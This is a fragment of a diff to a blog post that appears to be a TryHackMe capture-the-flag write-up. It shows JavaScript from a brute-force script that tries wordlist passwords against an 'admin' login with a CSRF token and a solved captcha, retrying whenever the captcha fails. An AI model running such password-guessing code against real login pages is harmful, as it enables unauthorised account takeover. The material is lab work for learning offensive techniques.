davidequirillo/davidequirillo.github.io/_posts/challenges/2025-07-11-thm-captchapocalypse.md

     var i = 0;
     for (let word of words) {
         result = 2;
-        while (result == 2) { // while captcha is not recognized we continue with the same password attempt console.log(i + ";admin:" + word + ";csrf:" + csrf_str + ";captcha:" + captcha_str);
+        while (result == 2) { // while captcha is not recognized we will retry login with the same password and a new captcha console.log(i + ";admin:" + word + ";csrf:" + csrf_str + ";captcha:" + captcha_str);
             result = await custom_login(login_url, session_id, username, word, csrf_str, captcha_str);
             if (result == 0) { // login successful